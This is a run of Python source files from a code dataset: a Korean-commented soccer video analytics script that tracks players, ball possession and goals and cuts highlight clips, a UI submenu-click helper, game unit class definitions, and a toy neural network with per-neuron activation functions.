heatmap_background = cv2.resize(heatmap_background,(width,height))\r\n original = cv2.resize(original,(width,height))\r\n radar = original.copy() \r\n \r\n # draw tracked objects\r\n for i, newbox in enumerate(boxes):\r\n \r\n p1 = (int(newbox[0]), int(newbox[1]))\r\n p2 = (int(newbox[0] + newbox[2]), int(newbox[1] + newbox[3]))\r\n \r\n \r\n ################################################### 공 점유율 계산 알고리즘 ########################################################\r\n \r\n # 예외처리 (사람이 경기장 끝으로 갔을 경우 -> out of index error 발생)\r\n player_x1 = p1[0]-10 \r\n player_x2 = p2[0]+10\r\n player_y1= p1[1]-10 \r\n player_y2= p2[1]+10\r\n \r\n if player_x1 < 0 :\r\n player_x1 = 0 \r\n if player_x2 > frame.shape[1] : # 가로 길이를 초과할 경우 \r\n player_x2 = frame.shape[1]\r\n \r\n if player_y1 < 0 :\r\n player_y1 = 0 \r\n if player_y2 > frame.shape[0] : # 세로 길이를 초과할 경우\r\n player_y2 = frame.shape[0]\r\n \r\n \r\n # 공 점유 인식 (공이 선수 roi 박스 안으로 들어올 경우지정해준 선수와 가까이 있을 경우)\r\n # roi 파란색\r\n if( player_x1 fps : # 일정 시간 이상동안 roi가 빨간색이라면 '선수의 드리블'이 아니라 '패스'임\r\n pass_count += 1 # 선수에게 공을 뺏기거나(패스실패) 패스 성공해서 공 점유 끝남\r\n red_ROI_cnt = 0 \r\n blue_ROI = False \r\n \r\n ##################################################################\r\n \r\n ########################################################################################################\r\n \r\n if(ball_x[frame_cnt] > -1):\r\n \r\n ###################################################골 인식 알고리즘 ############################################################# \r\n \r\n # 공이 슬로우모션으로 쫓아가는 현상 해결(현재 프레임과 공이 인식된 프레임 번호가 같을 경우만 화면에 공 출력)\r\n if ball_frame_cnt[frame_cnt] == frame_cnt :\r\n \r\n # Home팀의 '골 에어리어'에 공이 진입한 경우 초록색으로 표시 (가로 1000일 경우: 100이하, 900이상)\r\n if ball_x[frame_cnt] >= width * 0.9 : \r\n \r\n isInGoalNet = False \r\n invisible = frame_cnt - pre_frame_cnt\r\n \r\n if invisible > fps :# '골 에어리어' 영역에서 영상의 '프레임률(fps)' 이상 보이지 않는다면 공은 골 안에 있음 \r\n isInGoalNet = True\r\n \r\n # '골'인 경우 노란색으로 표시\r\n if isInGoalNet == True : #if ball_x == 947 and ball_y ==289 :\r\n print('Home팀 골인입니다!!!!!', frame_cnt)\r\n print('invisible term: ', invisible)\r\n #cv2.waitKey(0) # 화면 정지하고 키 입력을 기다리도록 \r\n \r\n cv2.putText(frame, 
'Home team Goal!! ',(250, 276), cv2.FONT_HERSHEY_COMPLEX, 1.5, (0,0,255), 2, cv2.LINE_AA)\r\n show_goal_frame = 1\r\n highlight_goal_point = frame_cnt # 골인을 인식한 프레임을 하이라이트 기준으로 삼음 \r\n \r\n \r\n cv2.circle(frame, (ball_x[frame_cnt], ball_y[frame_cnt]), 5, (0, 228, 255), 2) # 노란색으로 표시\r\n pre_frame_cnt = frame_cnt\r\n \r\n \r\n\r\n else :\r\n print(\"Home팀 골에어리어에 공이 진입했습니다.\", frame_cnt) \r\n cv2.circle(frame, (ball_x[frame_cnt], ball_y[frame_cnt]), 5, (22, 219, 29), 2) # 초록색으로 표시\r\n pre_frame_cnt = frame_cnt\r\n \r\n # Away팀의 '골 에어리어'에 공이 진입한 경우 초록색으로 표시 (가로 1000일 경우: 100이하, 900이상)\r\n elif ball_x[frame_cnt] <= width * 0.1 : \r\n \r\n isInGoalNet = False \r\n invisible = frame_cnt - pre_frame_cnt\r\n \r\n \r\n if invisible > fps :# '골 에어리어' 영역에서 영상의 '프레임률(fps)' 이상 보이지 않는다면 공은 골 안에 있음 \r\n isInGoalNet = True\r\n \r\n # '골'인 경우 노란색으로 표시\r\n if isInGoalNet == True : #if ball_x == 947 and ball_y ==289 :\r\n print('Away팀 골인입니다!!!!!', frame_cnt)\r\n print('invisible term: ', invisible)\r\n \r\n cv2.circle(frame, (ball_x[frame_cnt], ball_y[frame_cnt]), 5, (0, 228, 255), 2) # 노란색으로 표시\r\n pre_frame_cnt = frame_cnt\r\n highlight_goal_point = frame_cnt # 골인을 인식한 프레임을 하이라이트 기준으로 삼음\r\n \r\n \r\n else :\r\n print(\"Away팀 골에어리어에 공이 진입했습니다.\", frame_cnt)\r\n cv2.circle(frame, (ball_x[frame_cnt], ball_y[frame_cnt]), 5, (22, 219, 29), 2) # 초록색으로 표시\r\n pre_frame_cnt = frame_cnt\r\n \r\n \r\n # 골에어리어에 공이 진입하지도 않았고, '골'도 아닌 경우\r\n else : \r\n \r\n cv2.circle(frame, (ball_x[frame_cnt], ball_y[frame_cnt]), 5, (0, 0, 255), 2)\r\n pre_frame_cnt = frame_cnt\r\n\r\n # rectangle(): 직사각형을 그리는 함수-길\r\n #파라미터 (이미지, 왼쪽 위 좌표, 오른쪽 아래 좌표, 사각형 색깔, 사각형의 두께, ?? ) -길\r\n \r\n ################################################################################################################################################\r\n\r\n cv2.putText(frame, team_name+' '+str(player_num), (int(newbox[0])-27, int(newbox[1])-5), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0,0,255), 1, cv2.LINE_AA) #Multitracker_Window\r\n\r\n cv2.circle(radar,(int(newbox[0]), int(newbox[1])), 10, (0,0,255), -1)\r\n \r\n \r\n if(ball_x[frame_cnt] > -1):\r\n cv2.circle(radar, (ball_x[frame_cnt], ball_y[frame_cnt]), 7, (0, 0, 0), -1)\r\n #Radar_Window\r\n\r\n overlay=heatmap_background.copy()\r\n alpha = 0.5 # Transparency factor.\r\n # cv2.circle(overlay,(int(newbox[0]), int(newbox[1])), 3, colors12[i], -1) #Heatmap_Window\r\n # Following line overlays transparent rectangle over the imagex\r\n # heatmap_background = cv2.addWeighted(overlay, alpha, heatmap_background, 1 - alpha, 0) #Heatmap_Window\r\n \r\n # 거리와 속도 추정치를 계산하기 위한 코드들\r\n if(frame_cnt==0) :\r\n lastPoint = Point(x = int(newbox[0]), y = int(newbox[1])) # 첫 프레임에서는 과거 좌표를 현재좌표와 동일하게 초기화함\r\n coord_head = coord_tail = Point(x = int(newbox[0]), y = int(newbox[1])) # 히트맵을 위한 좌표값들 초기화\r\n \r\n if((frame_cnt%fps)==0) : # 프레임기반 1초(fps)마다 동작하는 코드\r\n # 초당 프레임간 발생한 거리차이를 a, b에 누적시킴 \r\n a = (int)(newbox[0]) - lastPoint.x\r\n b = (int)(newbox[1]) - lastPoint.y\r\n \r\n moving_weight=math.sqrt(math.pow(a,2) + math.pow(b,2)) # 초당 움직인 거리(즉 속도) - 유클리디안 거리측정 사용\r\n \r\n # 트레커 추적중 발생하는 진동을 최소화하기위한 코드\r\n if(moving_weight < 2) :\r\n moving_weight=0\r\n estimate_distance = estimate_distance + moving_weight # 추정거리값을 누적시킴\r\n \r\n distance = 4 * estimate_distance / 100 # 추정거리에서 도출된 값에 가중치를 두고 m단위로 변환 \r\n distance = round(distance,2) # 반올림 처리 \r\n speed = (4 * moving_weight / 100)*3.6 # moving_weight를 통해 구해진 m/s에 3.6을 곱해 속도를 k/h로 바꿔줌\r\n speed = round(speed,2)\r\n \r\n if( speed < 5 ) :\r\n walk_cnt = walk_cnt+1\r\n elif( speed 
< 10 ) :\r\n jog_cnt = jog_cnt+1\r\n else :\r\n sprint_cnt = sprint_cnt+1\r\n \r\n if(speed > top_speed) : # 최고속도를 top_speed에 저장\r\n top_speed = speed\r\n \r\n \r\n \r\n accumulate_speed = accumulate_speed+speed # 속도값들을 전부 누적시킴\r\n \r\n if(frame_cnt!=0):\r\n avg_speed = accumulate_speed / (frame_cnt/fps)\r\n avg_speed = round(avg_speed,1)\r\n else :\r\n avg_speed = 0\r\n \r\n \r\n lastPoint = Point(x = int(newbox[0]), y = int(newbox[1])) # 과거 좌표 갱신\r\n \r\n #txt 로그로 남겨주는 부분\r\n # f.write( 'Player '+str(i)+' x,y: '+str(int(newbox[0]))+','+str(int(newbox[1])) + '\\n' )\r\n # fTemp.write(str(int(newbox[1]))+','+str(int(newbox[0]))+'\\n') 히트맵에 더많은 로그를 찍기위해 이동\r\n \r\n #if(frame_cnt % (fps*3)==0) :\r\n if(coord_head == coord_tail) :\r\n coord_head = Point(x = int(newbox[0]), y = int(newbox[1]))\r\n else :\r\n coord_tail = coord_head\r\n coord_head = Point(x = int(newbox[0]), y = int(newbox[1]))\r\n cv2.arrowedLine(overlay,coord_tail, coord_head, (0,0,0),2,cv2.LINE_AA)\r\n cv2.arrowedLine(overlay,coord_tail, coord_head, (0,0,0),2,cv2.LINE_AA)\r\n\r\n heatmap_background = cv2.addWeighted(overlay, alpha, heatmap_background, 1 - alpha, 0) #Heatmap_Window\r\n\r\n \r\n \r\n if((frame_cnt % (fps*10))==0) : # 프레임기반 10초(fps)마다 동작하는 코드\r\n if(frame_cnt==0) : \r\n heatmap_filename = 'heatmap_0secs.png'\r\n else :\r\n heatmap_filename = 'heatmap_'+str(frame_cnt / (fps*10)*10)+'secs.png'\r\n\r\n cv2.imwrite(heatmap_filename, heatmap_background, [cv2.IMWRITE_PNG_COMPRESSION, 0])\r\n\r\n # 10초마다 DB로 전송할 부분\r\n ##########################################################################################\r\n # heatmap_filename = 10초마다 찍은 png 파일명\r\n ##########################################################################################\r\n \r\n\r\n if((frame_cnt % (fps*interval))==0) : # 프레임기반 interval[현재는 30초(fps)]마다 동작하는 코드\r\n interval_distance = distance - temp_distance\r\n temp_distance = distance\r\n interval_distance = round(interval_distance,2)\r\n \r\n interval_acc_speed = accumulate_speed - temp_speed;\r\n temp_speed = accumulate_speed\r\n \r\n interval_avg_speed = interval_acc_speed / interval\r\n interval_avg_speed = round(interval_avg_speed,1)\r\n # 30초마다 DB로 전송할 부분\r\n ##########################################################################################\r\n # interval_distance = 30초마다 뛴 거리\r\n # interval_avg_speed = 30초마다 뛴 속도\r\n ##########################################################################################\r\n print('5분 뛴 거리 추정치 : ', interval_distance, ' / 5분 뛴 속도 추정치 : ',interval_avg_speed,' km/h')\r\n #f.write(str(int(newbox[1]))+','+str(int(newbox[0]))+'\\n')\r\n str_coord = str_coord+str(int(newbox[1]))+','+str(int(newbox[0]))+'\\n' # str_coord 스트링에 좌표값을 누적시킴\r\n \r\n \r\n #골인 경우 2초 동안 화면에 보여주기 위함######################### \r\n \r\n if 1 <=show_goal_frame <= fps * 2 :\r\n if show_goal_frame != 1 :\r\n cv2.putText(frame, 'Home team Goal!! 
',(250, 276), cv2.FONT_HERSHEY_COMPLEX, 1.5, (0,0,255), 2, cv2.LINE_AA)\r\n show_goal_frame += 1\r\n ####################################################\r\n \r\n frame_cnt=frame_cnt+1 # 프레임 갯수를 세어줌\r\n \r\n \r\n \r\n # print('거리 추정치 : ', distance, ' / 속도 추정치 : ',speed,' km/h')\r\n \r\n # 누적 거리값을 레이더의 플레이어 머리위에 띄워줌\r\n cv2.putText(radar, str(speed)+'km/h '+str(distance)+'m', (int(newbox[0]-60), int(newbox[1])-20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255), 1, cv2.LINE_AA) #Multitracker_Window\r\n # 레이더창에 실시간으로 선수의 볼터치 비율 보여주기 \r\n cv2.putText(radar, 'Speed : '+str(speed)+'km/h'+ ', Top speed : '+str(top_speed)+ 'km/h',(55, 40), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255), 1, cv2.LINE_AA)\r\n cv2.putText(radar, 'Average speed : '+str(avg_speed)+'km/h'+', Running Distance : '+str(distance)+'m', (55, 60), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255), 1, cv2.LINE_AA)\r\n cv2.putText(radar, 'Walk / Jog / Sprint Count: '+str(walk_cnt)+' / '+str(jog_cnt)+' / '+str(sprint_cnt), (55, 80), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255), 1, cv2.LINE_AA)\r\n cv2.putText(radar, 'Ball Touch Count: '+str(ball_touch), (55, 100), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255), 1, cv2.LINE_AA)\r\n cv2.putText(radar, 'Pass Count: '+str(pass_count), (55, 120), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255), 1, cv2.LINE_AA)\r\n \r\n\r\n # show all windows\r\n cv2.imshow('frame', frame)\r\n # cv2.imshow('fgMask', fgMask)\r\n cv2.imshow('HeatMap',heatmap_background)\r\n cv2.imshow('Radar',radar)\r\n \r\n # quit on ESC button\r\n if cv2.waitKey(1) & 0xFF == 27: #incase Esc is pressed\r\n cv2.destroyAllWindows() # 화면 종료해주기\r\n break\r\n \r\n ################################################################영상 닫힘################################################################ \r\n \r\n \r\n avg_speed = accumulate_speed / (frame_cnt/fps)\r\n avg_speed = round(avg_speed,1)\r\n \r\n # 처음에 관리자가 A팀 선수와 B팀 몇 명씩 뛰는지 입력\r\n #player = 1, 2 \r\n #i = 0, 1\r\n\r\n #player = 3, 4\r\n # i = 2, 3 -> i = 0, 1 (flag만큼 뺴줘야 함)\r\n #flag = 2 \r\n \r\n ########################## 공 점유율 계산 알고리즘 ###############################################\r\n if player >= flag + 1 : # A팀 3명, B팀 5명으로 경기할 경우 -> flag = 3 \r\n ball_share_B.append(ball_touch) \r\n print('B팀 ', player-flag, '번째 선수 개인의 공 점유 프레임 수 : ', ball_share_B[player-flag-1]) # 0, 1...\r\n sum_ball_B += ball_share_B[player-flag-1]\r\n print('B팀 공 점유 프레임 수 누적값: ', sum_ball_B)\r\n else :\r\n ball_share_A.append(ball_touch) \r\n print('A팀 ', player, '번째 선수 개인의 공 점유 프레임 수 : ', ball_share_A[player-1])\r\n sum_ball_A += ball_share_A[i]\r\n print('A팀 공 점유 프레임 수 누적값: ', sum_ball_A)\r\n \r\n #############################################################################################\r\n\r\n print('총 뛴 거리 : ', distance,'m')\r\n print('최고 속도 : ', top_speed,'km/h')\r\n print('평균 속도 : ', avg_speed,'km/h')\r\n print('볼 터치 횟수 : ', ball_touch)\r\n print('패스 횟수 : ', pass_count,'개')\r\n #print('영상 총 프레임 수 : ', frame_cnt)\r\n\r\n \r\n move_sum = walk_cnt+jog_cnt+sprint_cnt\r\n walk_weight = round(walk_cnt / move_sum * 100,1)\r\n jog_weight = round(jog_cnt / move_sum * 100,1)\r\n sprint_weight = round(sprint_cnt / move_sum * 100,1)\r\n print('걸음 : ', walk_weight,'%, 뜀 : ', jog_weight,'%, 스프린트 : ', sprint_weight,'%')\r\n\r\n\r\n # 산소 소비량으로 측정하는 대략적인 칼로리 계산법 평균 속도 * (3.5 * 몸무게 * 시간(분) * 5 / 1000\r\n # 몸무게는 성인 남성 평균체중인 75kg로 가정\r\n cal = round(avg_speed * (3.5 * 75 *( 0.0167 * move_sum )) * 5 / 1000,1)\r\n print('소모 칼로리 : ',cal)\r\n \r\n player_file.write(str_coord)\r\n player_file.close()\r\n if(not(str_coord=='')) :\r\n 
heatmap.printHeatMap(height,width)\r\n \r\n\r\n # 최종 데이터를 DB로 전송할 부분\r\n ##########################################################################################\r\n # distance = 최종 뛴 거리, avg_speed = 평균속도, top_speed = 최고 속도\r\n # walk_weight = 걷기 비중, jog_weight = 조깅 비중, sprint_weight = 스프린트 비중\r\n # cal = 소모 칼로리\r\n # result_heatmap.png = 최종 히트맵 파일명\r\n ##########################################################################################\r\n \r\n \r\n \r\n ########################################공 점유율 계산 알고리즘################################################\r\n \r\n #for문이 다 돌은 뒤 공 점유율 계산\r\n ball_share_A_res = sum_ball_A / (sum_ball_A + sum_ball_B) * 100\r\n ball_share_B_res = sum_ball_B / (sum_ball_A + sum_ball_B) * 100\r\n \r\n print('\\n')\r\n print('---------------------------------------------------------------------------------------------------')\r\n print('A팀 공 점유율: ', sum_ball_A, ' % (', sum_ball_A, '+', sum_ball_B, ') x 100 = ', ball_share_A_res, '%')\r\n print('B팀 공 점유율: ', sum_ball_B, ' % (', sum_ball_A, '+', sum_ball_B, ') x 100 = ', ball_share_B_res, '%')\r\n print('---------------------------------------------------------------------------------------------------')\r\n \r\n print('DB에 분석데이터가 저장되었습니다.')\r\n \r\n \r\n \r\n ##########################################################################################################\r\n\r\n \r\n ##########################################하이라이트 추출 알고리즘#################################################\r\n \r\n \r\n print('\\n')\r\n print('하이라이트 추출 시작.....')\r\n \r\n ########################Goal.mov영상 생성#######################\r\n # 골을 인식한 프레임이 영상에서 몇 초쯤인지 계산\r\n videoFps = cap.get(cv2.CAP_PROP_FPS) # 1초에 지나가는 프레임 수(fps)\r\n point1 = int (highlight_goal_point / videoFps )\r\n \r\n # 골을 인식한 프레임 앞으로 3초, 뒤로 2초\r\n start = point1 - 3\r\n end = point1 + 2\r\n \r\n # 영상의 start부터 end까지 영역을 자름 (초 기준)\r\n ffmpeg_extract_subclip(\"TEST.mov\", start, end, targetname=\"Goal.mov\") \r\n \r\n ####################Goal_zoom.mov 영상 생성######################\r\n cap = cv2.VideoCapture('Goal.mov')\r\n\r\n #재생할 파일의 넓이와 높이\r\n width = cap.get(cv2.CAP_PROP_FRAME_WIDTH)\r\n height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)\r\n\r\n #print(\"재생할 파일 넓이, 높이 : %d, %d\"%(width, height))\r\n\r\n fourcc = cv2.VideoWriter_fourcc(*'DIVX')\r\n out1 = cv2.VideoWriter('Goal_zoom1.mov', fourcc, 30.0, (int(width), int(height)))\r\n out2 = cv2.VideoWriter('Goal_zoom2.mov', fourcc, 30.0, (int(width), int(height)))\r\n \r\n while(cap.isOpened()):\r\n ret, frame = cap.read()\r\n \r\n if ret == False:\r\n break;\r\n # out1에 해당\r\n scale =50\r\n height, width, channel = frame.shape\r\n centerX, centerY = int(height*0.5), int(width*0.75) #골인시 줌 위치 \r\n radiusX, radiusY = int(scale*height/100), int(scale*width/100)\r\n \r\n minX,maxX=centerX-radiusX,centerX+radiusX\r\n minY,maxY=centerY-radiusY,centerY+radiusY\r\n \r\n cropped = frame[minX:maxX, minY:maxY]\r\n resized_cropped = cv2.resize(cropped, (width, height)) \r\n \r\n out1.write(resized_cropped)\r\n \r\n # out2에 해당\r\n scale2 = 40\r\n height2, width2, channel2 = frame.shape\r\n centerX2, centerY2 = int(height2*0.5), int(width2*0.75) #골인시 줌 위치 \r\n radiusX2, radiusY2 = int(scale2*height2/100), int(scale2*width2/100)\r\n \r\n minX2,maxX2=centerX2-radiusX2,centerX2+radiusX2\r\n minY2,maxY2=centerY2-radiusY2,centerY2+radiusY2\r\n \r\n cropped2 = frame[minX2:maxX2, minY2:maxY2]\r\n resized_cropped2 = cv2.resize(cropped2, (width2, height2)) \r\n \r\n out2.write(resized_cropped2)\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n 
break\r\n \r\n cap.release()\r\n out1.release()\r\n out2.release()\r\n cv2.destroyAllWindows()\r\n ######################################Highlight.mov###################################\r\n \r\n # concat함수를 이용해 비디오를 합쳐주기\r\n clip1 = VideoFileClip('Goal.mov')\r\n clip2 = VideoFileClip('Goal_zoom1.mov')\r\n clip3 = VideoFileClip('Goal_zoom2.mov')\r\n \r\n final_clip = concatenate_videoclips([clip1, clip2, clip3])\r\n final_clip.write_videofile('Highlight.mov', codec='libx264') # 코텍 적어줘야\r\n\r\n \r\n print('하이라이트 영상 생성 완료.....')\r\n #test용 코드\r\n #print(highlight_goal_point, ' ', start, ' ', end) \r\n \r\n ##########################################################################################################\r\n\r\n\r\n\r\n\r\n#v2.2 5분동안 뛴 속력 측정, 걸음/조깅/스프린트 비중 측정, 칼로리 측정 기능 추가\r\n\r\n\r\n# 사각형의 중심 좌표\r\n# center_x = left+w / 2\r\n# center_y = top+h / 2\r\n# 풋살장 국제규격 길이(가로) 38m ~ 42m / 너비(세로) 20 ~ 25m 계산하기 쉽도록 가로 40m 세로 20m로 가정함 4000 2000 / 1000 571\r\n\r\n\r\n# 10초 히트맵 사진\r\n\r\n# 30초마다 뛴거리\r\n \r\n# 최종 뛴거리, 평균속도, 최고속도\r\n\r\n\r\n# 30초마다 평균속도, 최종 히트맵, 칼로리, 비율 추가해야함\r\n","sub_path":"All_Is_Well_program/test/player&soccerball/main_noDB_TEST.py","file_name":"main_noDB_TEST.py","file_ext":"py","file_size_in_byte":37743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"602326995","text":"import sys\nimport Module.Algorithms\nimport Module.Utility\nimport Module.logger\nimport Module.getObject\nimport Module.CleanUp\nimport Module.Report\nimport Class.UserDefinedException\nimport Module.learningAlgo\nimport time\nimport Module.RecordTime\nimport Module.cfg\n\ndef clickOnSubmenu(driverObject,subMenuName):\n t1 = time.perf_counter()\n Excep = Class.UserDefinedException.UserDefinedException()\n success = 0\n if subMenuName == None:\n Module.logger.ERROR(\"Sub Menu name not provided\")\n\n obj = Module.getObject.getObjByRepo(driverObject,\"submenu\",subMenuName)\n if obj != None:\n try:\n obj.click()\n Module.logger.INFO(\"Sub-menu\" + subMenuName + \" is clicked\")\n success = 1\n except:\n Module.logger.ERROR(\"Sub Menu \"+subMenuName+ \"is not clickable\")\n\n\n if success == 0 and Module.cfg.learnFileSuccess == 1:\n try:\n success = Module.learningAlgo.getLearnedElements(driverObject, \"submenu\", subMenuName, \"\",position=1)\n except:\n Module.logger.WARNING(\"No Object found for submenu \" + subMenuName)\n\n\n if success == 0:\n obj = Module.getObject.getObjByAlgo(driverObject,\"submenu\",subMenuName)\n if obj != None:\n try:\n obj.click()\n Module.learningAlgo.add_obj_using_id(driverObject,\"submenu\", subMenuName, obj,position=1)\n Module.logger.INFO(\"Sub-menu\" + subMenuName + \" is clicked\")\n except:\n # Clean up before raising exception\n Module.Report.Failure(driverObject, \"SubMenu \" + subMenuName + \"is not clickable\")\n Module.CleanUp.killAllProcess()\n Excep.raiseException(\"SubMenu \" + subMenuName + \"is not clickable\")\n else:\n Module.Report.Failure(driverObject,\"SubMenu \" + subMenuName + \" not found\")\n Excep.raiseException(\"No Object found for sub menu \"+subMenuName)\n\n Module.RecordTime.calculateTime(\"clickOnSubmenu\", time.perf_counter() - t1)\n Module.RecordTime.calculateTime(\"AutomationTime\", time.perf_counter() - t1)","sub_path":"Commands/clickOnSubMenu.py","file_name":"clickOnSubMenu.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"273928031","text":"from Units.unit import Unit\n\n\nclass 
ThirdNotUpgraded(Unit):\n \"\"\"\n Биография:\n В мирное время, Hunters обеспечивают общество Sylvan едой, и они весьма\n уважаемы за их способности и отвагу. Странствуя по Irollan, они живут в\n гармонии с Природой и её неписанными законами. Они никогда не убьют\n живое существо просто так. Однако, в военное же время, они без\n сожаления используют свои таланты для уничтожения врагов издалека. Их\n необъяснимое сращивание в единое целое с их зачарованными Elf Bows\n позволяет им стрелять дважды, ещё до того, как соперник успеет моргнуть\n \"\"\"\n def __init__(self):\n super().__init__(\"Hunter\", # name\n 4, # attack\n 1, # protection\n 5, # min_damage\n 7, # max_damage\n 10, # health\n 10, # initiative\n 5, # speed\n None, # shots\n None, # mana\n 120, # cost\n 70, # upgrade\n 1, # length\n 1, # width\n None, # spells\n 0) # count\n\n\nclass ThirdUpgraded(Unit):\n \"\"\"\n Биография:\n Master Hunters посвящают свою жизнь обороне лесных царств и поднимаются\n как один, чтобы защитить его от посягательств любых чужаков.\n Специальное колдовство, наложенное на их стрелы и луки позволяет им\n выстрелить дважды ещё даже до того, как враг поймёт, что они здесь, а\n также гарантирует, что цель будет выздоравливать очень медленно после\n их атаки.\n \"\"\"\n def __init__(self):\n super().__init__(\"Master Hunter\", # name\n 5, # attack\n 4, # protection\n 5, # min_damage\n 9, # max_damage\n 14, # health\n 10, # initiative\n 5, # speed\n 16, # shots\n None, # mana\n 190, # cost\n None, # upgrade\n 1, # length\n 1, # width\n None, # spells\n 0) # count)\n","sub_path":"NatureProtection/ThirdCreature.py","file_name":"ThirdCreature.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"274511206","text":"import numpy as np\r\nimport multiprocessing as mp\r\nfrom NetworkGraphics import VisualizeNetwork\r\nfrom activations import *\r\n\r\nclass NetworkLayer():\r\n def __init__(self, number_of_inputs, number_of_neurons, activation_functions):\r\n self.weights = 2 * np.random.random((number_of_inputs, number_of_neurons)) - 1\r\n self.number_of_inputs = number_of_inputs\r\n self.activations = activation_functions\r\n self.number_of_neurons = number_of_neurons\r\n\r\n self.functions = {\r\n 1: sigmoid_activation,\r\n 2: tanh_activation,\r\n 3: sin_activation,\r\n 4: gauss_activation,\r\n 5: relu_activation}\r\n '''6: softplus_activation,\r\n 7: identity_activation,\r\n 8: clamped_activation,\r\n 9: inv_activation,\r\n 10: log_activation,\r\n 11: exp_activation,\r\n 12: abs_activation,\r\n 13: hat_activation,\r\n 14: square_activation,\r\n 15: cube_activation\r\n }'''\r\n\r\n self.derivatives = {\r\n 1: sigmoid_derivative,\r\n 2: tanh_derivative,\r\n 3: sin_derivative,\r\n 4: gauss_derivative,\r\n 5: relu_derivative}\r\n '''6: softplus_derivative,\r\n 7: identity_derivative,\r\n 8: clamped_derivative,\r\n 9: inv_derivative,\r\n 10: log_derivative,\r\n 11: exp_derivative,\r\n 12: abs_derivative,\r\n 13: hat_derivative,\r\n 14: square_derivative,\r\n 15: cube_derivative\r\n }'''\r\n\r\n def think(self, input):\r\n output = np.zeros(self.activations.size)\r\n self.last_inputs = input\r\n i = 0\r\n for j in np.nditer(self.activations):\r\n temp = np.dot(input, self.weights[:,i])\r\n output[i] = self.functions[self.activations[i]](temp)\r\n i += 1\r\n\r\n return output\r\n\r\n def print_debug(self):\r\n print(self.weights)\r\n print(self.activations)\r\n print(\"\")\r\n\r\nclass NeuralNetwork():\r\n def __init__(self, 
layers):\r\n self.d_factors = np.zeros(layers[len(layers) - 1].number_of_neurons)\r\n self.range = 0.1\r\n self.layer_dict = {}\r\n self.total_number_of_neurons = 0\r\n self.neurons_in_layers = np.zeros(len(layers))\r\n for i in range(0, len(layers)):\r\n self.layer_dict[i+1] = layers[i]\r\n self.total_number_of_neurons += layers[i].number_of_neurons\r\n self.neurons_in_layers[i] = layers[i].number_of_neurons\r\n self.activation_decisions = np.zeros(self.total_number_of_neurons)\r\n\r\n def set_d_factors(self):\r\n self.d_factors = np.zeros(self.total_number_of_neurons)\r\n\r\n def make_decision(self, input):\r\n count = 0\r\n for i in np.nditer(self.d_factors):\r\n if(input > i or np.abs(input - i) <= self.range):\r\n i = input\r\n return count\r\n else:\r\n count += 1\r\n return None\r\n\r\n #todo: offset neuronIDs by one\r\n def change_activation(self, functionID, neuronID, d_weight):\r\n d_factor = self.d_factors[neuronID]\r\n if(d_weight >= d_factor):\r\n return True\r\n elif(np.abs(d_factor - d_weight) <= self.range):\r\n return True\r\n else:\r\n return False\r\n\r\n # need highest value, pos\r\n def get_suggestion(self, output):\r\n max = np.amax(output)\r\n max_pos = np.argmax(output)\r\n\r\n return max, max_pos\r\n\r\n def run_network(self, input):\r\n output = input\r\n for i in range(0, len(self.layer_dict)):\r\n output = self.layer_dict[i+1].think(output)\r\n\r\n return output\r\n\r\n def get_activation(self, neuronID, error):\r\n input = np.append(error, neuronID)\r\n output = self.run_network(input)\r\n\r\n number_of_activations = len(self.layer_dict[1].activations)\r\n activation = int(np.interp(output,[0,1],[0,number_of_activations - 1])) + 1\r\n d_temp = np.interp(output,[0,1],[0,number_of_activations - 1]) + 1\r\n diff = np.abs(activation - d_temp)\r\n \r\n inv = 0\r\n if(diff != 0):\r\n inv = 1 / diff\r\n elif(diff <= 0.01):\r\n inv = 100 # maximum possible value given a 0.01 resolution\r\n\r\n d_weight = np.interp(inv,[2,100],[0,1])\r\n \r\n return activation, d_weight\r\n #return int(len(self.layers_dict[1].functions) * output)\r\n\r\n \r\n def train(self, training_inputs, training_outputs, network_outputs, learning_rate, iterations):\r\n for i in range(iterations):\r\n length = len(self.layer_dict)\r\n delta = []\r\n for l in range(length, 0, -1):\r\n layer = self.layer_dict[l]\r\n j = 0\r\n for n in np.nditer(layer.activations):\r\n #print(l,j)\r\n if(l != length):\r\n nextlayer = self.layer_dict[l+1]\r\n error = delta.dot(nextlayer.weights.T)\r\n delta = error * layer.derivatives[layer.activations[j]](nextlayer.last_inputs)\r\n else:\r\n error = training_outputs - network_outputs\r\n delta = error * layer.derivatives[layer.activations[j]](network_outputs)\r\n if(l == 1):\r\n #print(delta)\r\n #print(nextlayer.last_inputs)\r\n #adjustment = training_inputs.dot(delta)\r\n adjustment = learning_rate * np.outer(training_inputs, delta)\r\n #print(adjustment)\r\n elif(l == length):\r\n adjustment = learning_rate * layer.last_inputs.T.dot(delta)\r\n #print(error)\r\n #print(layer.derivatives[layer.activations[j]].__name__)\r\n #print(delta) \r\n #print(adjustment)\r\n else:\r\n adjustment = learning_rate * nextlayer.last_inputs.T.dot(delta)\r\n layer.weights += adjustment\r\n j += 1\r\n\r\n def mutate(self):\r\n length = len(self.layer_dict)\r\n for l in range(length, 0, -1):\r\n layer = self.layer_dict[l]\r\n layer.weights = self.weights = 2 * np.random.random((layer.number_of_inputs, layer.number_of_neurons)) - 1\r\n \r\n def print_debug(self):\r\n for i in range(0, 
